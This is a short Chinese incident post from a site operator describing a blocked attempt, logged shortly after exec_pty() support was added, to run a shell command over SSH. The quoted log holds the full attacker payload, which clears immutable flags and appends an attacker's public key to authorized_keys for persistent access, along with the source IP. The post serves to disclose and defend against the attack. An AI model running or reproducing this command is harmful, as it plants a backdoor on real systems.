在本站支持exec_pty()之后不到三天，就发现了至少一次尝试利用该方法运行脚本，获取远
程访问权限的攻击。
好在该功能早就被禁止，并且开启了日志记录。
日志如下：

[2025-10-27 00:05:11] [9398] [ERROR] [net_server.c:184] Forbid exec /bin/sh -c u
name -a && nproc && sh -c 'cd ~ && \
mkdir -p .ssh && \
chattr -i .ssh 2>/dev/null || true && \
cd .ssh && \
chattr -i authorized_keys 2>/dev/null || true && \
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDVG/nZDX7VhH8Bmfds/27fbbuvNoaFdjfYO0
AdfVK11mFgpYP1qYqVVxZt4AsXzJUuOlxltZy1VbtNM7hj9GgIHQby7qa22MjmrRVUpccWuOi9su8SMH
bzKe0M069vjYJ+7OZhG838RnIgx/oKVmvtJENe8MH9kNFSKII55ucOZGE6U3AzU3kcO2ai9q3xpXxVaJ
+8QR6wpnN5yB8U39qQkAVPrA5MsDG9gmkJdqu0C+yECOc5NlrTQcOMLBY4SOzxEVzr7Lb/2ne1Cn+mfi
Sz7SYFEWkrtHoag1uDuX2zW87cggidyffS5IWN6Lmxu3hrnRG7znnBl7C+0Pv9PPItB9TLav/pNwBl2S
2ZQsvHGuGZtPI7pfleH4sOLpd+kUwHW0Fxy0fcSN1+scawkqVMnXDsejrmOKsD1QcEJjDGzgoXs0Z7Cx
wkMnVi05hkXcES/F9STBguDm8KTiKrO5w8RZayNCi1OqYldERURxkC6AeezLGP1M7chgjwyMTiFQdQV/
biTw4ccX1y05dwCgXck1moZxfvxzTwC3T+05zl+eP5HVf+mO1z57uVOdXDce+lzELJ68GgCHXWzgkHVf
dG0tf9eGEM1syqBBNh/f7ImF+tJAjnvAM+ZuuZuHnCRhBjtHVZfASzIiYfgsF+rPPLj8qt3Eu4lerAaM
VGtCHgdw== $(whoami)@$(hostname)" >> authorized_keys && \
chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys')

攻击来源ip：2.57.122.123
几条关联日志：

[2025-10-27 00:03:47] [2871] [INFO] Child process (9395) exited
[2025-10-27 00:05:09] [2871] [INFO] Accept SSH connection from 2.57.122.123:4503
2
[2025-10-27 00:05:09] [2871] [INFO] Child process (9398) start
[2025-10-27 00:05:18] [9398] [INFO] User [guest] login
[2025-10-27 00:05:18] [9398] [INFO] User [guest] logout, idle for 0 seconds sinc
e last input
[2025-10-27 00:05:18] [9398] [INFO] Process exit normally
[2025-10-27 00:05:18] [2871] [INFO] Child process (9398) exited